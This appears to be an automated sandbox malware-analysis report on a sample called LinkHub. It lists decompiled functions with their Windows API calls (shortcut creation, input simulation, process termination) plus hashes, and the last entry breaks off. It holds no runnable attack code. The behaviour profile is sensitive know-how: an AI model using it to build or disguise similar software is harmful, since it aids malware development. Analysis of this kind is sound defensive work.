Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 7885ef5a603caaa1251f7214a07d3c59567129d243d562f973ca3a61522867fd
Instruction ID: 91658a6946499accceece4ca3ea6283c7ae7f43c4e6e71a55d91b0c2ed7e25c5
Opcode Fuzzy Hash: 7885ef5a603caaa1251f7214a07d3c59567129d243d562f973ca3a61522867fd
Instruction Fuzzy Hash: 03510975620314AACF20BB6698D9B2AB3E5EF55310F2084C7F90ADF296DB749C40CB56

Function 00B79B51 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 00B041EA: _wcslen.LIBCMT ref: 00B041EF

Part of subcall function 00B08577: _wcslen.LIBCMT ref: 00B0858A

GetOpenFileNameW.COMDLG32(00000058), ref: 00B79F2A
_wcslen.LIBCMT ref: 00B79F4B
_wcslen.LIBCMT ref: 00B79F72
GetSaveFileNameW.COMDLG32(00000058), ref: 00B79FCA

Strings

X, xrefs: 00B79E57

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 4f45e24591864632f70d5360f688ff5c82c4977640addb9c351082ba835ede98
Instruction ID: 58535c4de9f964b1e4d99b64bbdff9137ce5a84a8b4545677735989fc5cd6281
Opcode Fuzzy Hash: 4f45e24591864632f70d5360f688ff5c82c4977640addb9c351082ba835ede98
Instruction Fuzzy Hash: 0FE181315043509FD724EF24C881A6ABBE1FF85314F0489ADF8999B2A2DB31ED05CB92

Function 00B76ED3 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B76F21
CoInitialize.OLE32(00000000), ref: 00B7707E
CoCreateInstance.OLE32(00BA0CC4,00000000,00000001,00BA0B34,?), ref: 00B77095
CoUninitialize.OLE32 ref: 00B77319

Strings

.lnk, xrefs: 00B76EFF, 00B76F69, 00B77025

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 3db97ec6fd7b5026fa516fafb75c60828f3462027afca191573bfc929c997aba
Instruction ID: cdc2b9884481fa354b8a9c1d5eb8668680a76ef75fd268642f3f920fcd4e24eb
Opcode Fuzzy Hash: 3db97ec6fd7b5026fa516fafb75c60828f3462027afca191573bfc929c997aba
Instruction Fuzzy Hash: 52D15D71508601AFC304EF24C881D6BBBE8FF94704F4089ADF5959B2A2DB71ED05CB92

Function 00B01B00 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00B0249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00B024B0

BeginPaint.USER32(?,?,?), ref: 00B01B35
GetWindowRect.USER32(?,?), ref: 00B01B99
ScreenToClient.USER32(?,?), ref: 00B01BB6
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00B01BC7
EndPaint.USER32(?,?,?,?,?), ref: 00B01C15
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00B43287

Part of subcall function 00B01C2D: BeginPath.GDI32(00000000), ref: 00B01C4B

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: 174cb02b8f184f191d100db0243fa2c69ce38010dc4fbef03da3df7c5d4b4a44
Instruction ID: 333c107601859d02757c12d7f73aa69be7a24d8748533268a04e34630c103f34
Opcode Fuzzy Hash: 174cb02b8f184f191d100db0243fa2c69ce38010dc4fbef03da3df7c5d4b4a44
Instruction Fuzzy Hash: 7A41E030105340AFD720DF28DCD5FBABBE8EB55720F040AAAFA548B2E1DB709945DB61

Function 00B98C36 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00B5FBEF,00000000,?,?,00000000,?,00B439E2,00000004,00000000,00000000), ref: 00B98CA7
EnableWindow.USER32(?,00000000), ref: 00B98CCD
ShowWindow.USER32(FFFFFFFF,00000000), ref: 00B98D2C
ShowWindow.USER32(?,00000004), ref: 00B98D40
EnableWindow.USER32(?,00000001), ref: 00B98D66
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00B98D8A

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 92a8207e64ab52da424f9da4142ea843473ec5f0c56577cc6acd0a2cd4700c51
Instruction ID: 14d5b7989d8522f0b468a41d4a8f8a66549748e84da13e2a52275784bf48ea38
Opcode Fuzzy Hash: 92a8207e64ab52da424f9da4142ea843473ec5f0c56577cc6acd0a2cd4700c51
Instruction Fuzzy Hash: 8741A230602244AFDF25DF24D999BA57BF1FF56304F1840FAE5085B2B2DB36A845CB60

Function 00B82D37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 00B82D45

Part of subcall function 00B7EF33: GetWindowRect.USER32(?,?), ref: 00B7EF4B

GetDesktopWindow.USER32 ref: 00B82D6F
GetWindowRect.USER32(00000000), ref: 00B82D76
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00B82DB2
GetCursorPos.USER32(?), ref: 00B82DDE
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00B82E3C

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: 8059e834c33da52cb9e09996dbb7017aeeb51a37e1eaabe6e487041b3b09caf9
Instruction ID: 96656a0de8cc51d65efa516cb4086bf1dc888bf3f688908b14a3014b7521f2c2
Opcode Fuzzy Hash: 8059e834c33da52cb9e09996dbb7017aeeb51a37e1eaabe6e487041b3b09caf9
Instruction Fuzzy Hash: 8A31E272505315ABC720EF14D845F9BBBE9FF84314F00096AF99997291DB30E908CBD2

Function 00B655E1 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00B655F9
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00B65616
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00B6564E
_wcslen.LIBCMT ref: 00B6566C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00B65674
_wcsstr.LIBVCRUNTIME ref: 00B6567E

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: a08af21da5d2dd00ef05b2d011dc3a5325f5578201c1585209be6cdbdce4bcce
Instruction ID: 3bdcc0296f39f4607e856ba10de4066d4ff51a60b41a5f5882c858e218cbc8d2
Opcode Fuzzy Hash: a08af21da5d2dd00ef05b2d011dc3a5325f5578201c1585209be6cdbdce4bcce
Instruction Fuzzy Hash: E92126322046007BEB255B29ED49E7B7BE8EF45750F1440AAF909DA091EFB8CC51C660

Function 00B76263 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00B05851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B055D1,?,?,00B44B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00B05871

_wcslen.LIBCMT ref: 00B762C0
CoInitialize.OLE32(00000000), ref: 00B763DA
CoCreateInstance.OLE32(00BA0CC4,00000000,00000001,00BA0B34,?), ref: 00B763F3
CoUninitialize.OLE32 ref: 00B76411

Strings

.lnk, xrefs: 00B762BB, 00B76306, 00B763CA

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: 9a247befd78bc46f1419d1e332fb6bc7f512d29cce07d6e5129eebb5a5848d8b
Instruction ID: 58db1a6de5becbb83daea6513fd8c7b0475a7147e68da3deb7f1cabc2f82841f
Opcode Fuzzy Hash: 9a247befd78bc46f1419d1e332fb6bc7f512d29cce07d6e5129eebb5a5848d8b
Instruction Fuzzy Hash: C7D14271A086019FC714DF28C480A2ABBF5FF89714F15889DF8999B3A1DB31ED45CB92

Function 00B986FC Relevance: 9.1, APIs: 6, Instructions: 82COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00B98740
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00B98765
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00B9877D
GetSystemMetrics.USER32(00000004), ref: 00B987A6
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00B7C1F2,00000000), ref: 00B987C6

Part of subcall function 00B0249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00B024B0

GetSystemMetrics.USER32(00000004), ref: 00B987B1

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 2aad74e6fcb6aefeb9c10a787977060747948be214c20b53dafc5e11132d8b8c
Instruction ID: 6d9373841a5e971a11c87c9ecafc2c8adb4a6d1d8d8e153c8f9782c5ae3a1e7f
Opcode Fuzzy Hash: 2aad74e6fcb6aefeb9c10a787977060747948be214c20b53dafc5e11132d8b8c
Instruction Fuzzy Hash: CA2192716112419FCF149FB9CC48A6A77E6EB46325F25467AF926C31F0EE388C51CB20

Function 00B236F2 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00B236E9,00B23355), ref: 00B23700
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B2370E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B23727
SetLastError.KERNEL32(00000000,?,00B236E9,00B23355), ref: 00B23779

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 5c8d0111595835ba9697a5d8e64d12414352a1efb67d04c1febb924cacb9335d
Instruction ID: 43b818ff616f4f6d61a2d1cba596cb4b972f163f4880636e71636ad666c17f09
Opcode Fuzzy Hash: 5c8d0111595835ba9697a5d8e64d12414352a1efb67d04c1febb924cacb9335d
Instruction Fuzzy Hash: 2F01FCB661D3316EAB2527B9BDD6D6B26D4EB19F7272003BAF118420F1EF594D025140

Function 00B330E7 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00B32908,00BC9B48,0000000C,00B23268,00000001,?,?), ref: 00B330EB
_free.LIBCMT ref: 00B3311E
_free.LIBCMT ref: 00B33146
SetLastError.KERNEL32(00000000), ref: 00B33153
SetLastError.KERNEL32(00000000), ref: 00B3315F
_abort.LIBCMT ref: 00B33165

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 9edbc5a01dc5432d65fa81ffdb3d017ce1a87f2202ba17ab89db010b3a7b6746
Instruction ID: a8e21e8604326794d6345ce3d2d73215f6fbde720f2de014f2d511b00bf8df7c
Opcode Fuzzy Hash: 9edbc5a01dc5432d65fa81ffdb3d017ce1a87f2202ba17ab89db010b3a7b6746
Instruction Fuzzy Hash: 0BF0C836904D0027D2222735AD06E5F36EADFC5F71F3504E5FA24F32E1EF208A024165

Function 00B99480 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00B01F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00B01F87
Part of subcall function 00B01F2D: SelectObject.GDI32(?,00000000), ref: 00B01F96
Part of subcall function 00B01F2D: BeginPath.GDI32(?), ref: 00B01FAD
Part of subcall function 00B01F2D: SelectObject.GDI32(?,00000000), ref: 00B01FD6

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00B994AA
LineTo.GDI32(?,00000003,00000000), ref: 00B994BE
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00B994CC
LineTo.GDI32(?,00000000,00000003), ref: 00B994DC
EndPath.GDI32(?), ref: 00B994EC
StrokePath.GDI32(?), ref: 00B994FC

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 8eb06fd56b3076341e97c20ef59a62f7df96f1cb55a51fb56276a680cc2c3dd0
Instruction ID: d8fd2c5b827cf172101e45362ca584a2d93dba1202222008f076e5ac68b567ef
Opcode Fuzzy Hash: 8eb06fd56b3076341e97c20ef59a62f7df96f1cb55a51fb56276a680cc2c3dd0
Instruction Fuzzy Hash: 7F112D7200014DBFEF129F95DC89E9A7FADEF08360F00C066FA195A1A1DB719D56DBA0

Function 00B65B61 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00B65B7C
GetDeviceCaps.GDI32(00000000,00000058), ref: 00B65B8D
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B65B94
ReleaseDC.USER32(00000000,00000000), ref: 00B65B9C
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00B65BB3
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00B65BC5

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 846bddc90c539d4eb393269f7c5b38cc9aec9513ad14db1d133d684ff9160c31
Instruction ID: c46130851ff72a0324757bf8a319bc9ffdb53a4d4f154375036d26a09fdc12f5
Opcode Fuzzy Hash: 846bddc90c539d4eb393269f7c5b38cc9aec9513ad14db1d133d684ff9160c31
Instruction Fuzzy Hash: 70014475A00718BBEB109FA69D49E4E7FB8EB45751F0440A6FA05A7280DA709C10CFA0

Function 00B0327E Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B032AF
MapVirtualKeyW.USER32(00000010,00000000), ref: 00B032B7
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B032C2
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B032CD
MapVirtualKeyW.USER32(00000011,00000000), ref: 00B032D5
MapVirtualKeyW.USER32(00000012,00000000), ref: 00B032DD

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: bc2f8cd7c00e14a69fdf4ba000a226f1fbdac88cbbe43b0a30c0f8ccd5ccef04
Instruction ID: 026089db65f3afb19decddc1841714ad733f843966b0b4bcd523d88b6317ceb3
Opcode Fuzzy Hash: bc2f8cd7c00e14a69fdf4ba000a226f1fbdac88cbbe43b0a30c0f8ccd5ccef04
Instruction Fuzzy Hash: 4F0167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5

Function 00B6F437 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00B6F447
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00B6F45D
GetWindowThreadProcessId.USER32(?,?), ref: 00B6F46C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B6F47B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B6F485
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B6F48C

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 5cd51cb193365b4e3cd474240c8a84289a059a410c720d51d48b1bc668149b0f
Instruction ID: 4faafc6f91c1f3ff098db5778824d7b7a591254e09ac46ca106ba75311722338
Opcode Fuzzy Hash: 5cd51cb193365b4e3cd474240c8a84289a059a410c720d51d48b1bc668149b0f
Instruction Fuzzy Hash: 46F01D32241158BBE72157639D0EEEB3B7CEBC6B11F00005AF601A21919AA45A01C6B5

Function 00B434D6 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00B434EF
SendMessageW.USER32(?,00001328,00000000,?), ref: 00B43506
GetWindowDC.USER32(?), ref: 00B43512
GetPixel.GDI32(00000000,?,?), ref: 00B43521
ReleaseDC.USER32(?,00000000), ref: 00B43533
GetSysColor.USER32(00000005), ref: 00B4354D

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 3798aeb4bcd9b840221027f833712cdad4b07fe033c1b97c75a245a49e9ca80a
Instruction ID: 0a4e0cc0b96a5dc92b9fd0aad8b01e7ebb8518e6863b11cdfcc680c8028e7d89
Opcode Fuzzy Hash: 3798aeb4bcd9b840221027f833712cdad4b07fe033c1b97c75a245a49e9ca80a
Instruction Fuzzy Hash: 7D012432500215EFDB505BA5DD49BEABBF1FB28721F5501A2FA1AA31A0CF311E51AB10

Function 00B621C1 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B621CC
UnloadUserProfile.USERENV(?,?), ref: 00B621D8
CloseHandle.KERNEL32(?), ref: 00B621E1
CloseHandle.KERNEL32(?), ref: 00B621E9
GetProcessHeap.KERNEL32(00000000,?), ref: 00B621F2
HeapFree.KERNEL32(00000000), ref: 00B621F9

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 9cf2a0e9e0125f7622eb1b4f755af575a746c5f5fc0486d54818d0bfd84a53a8
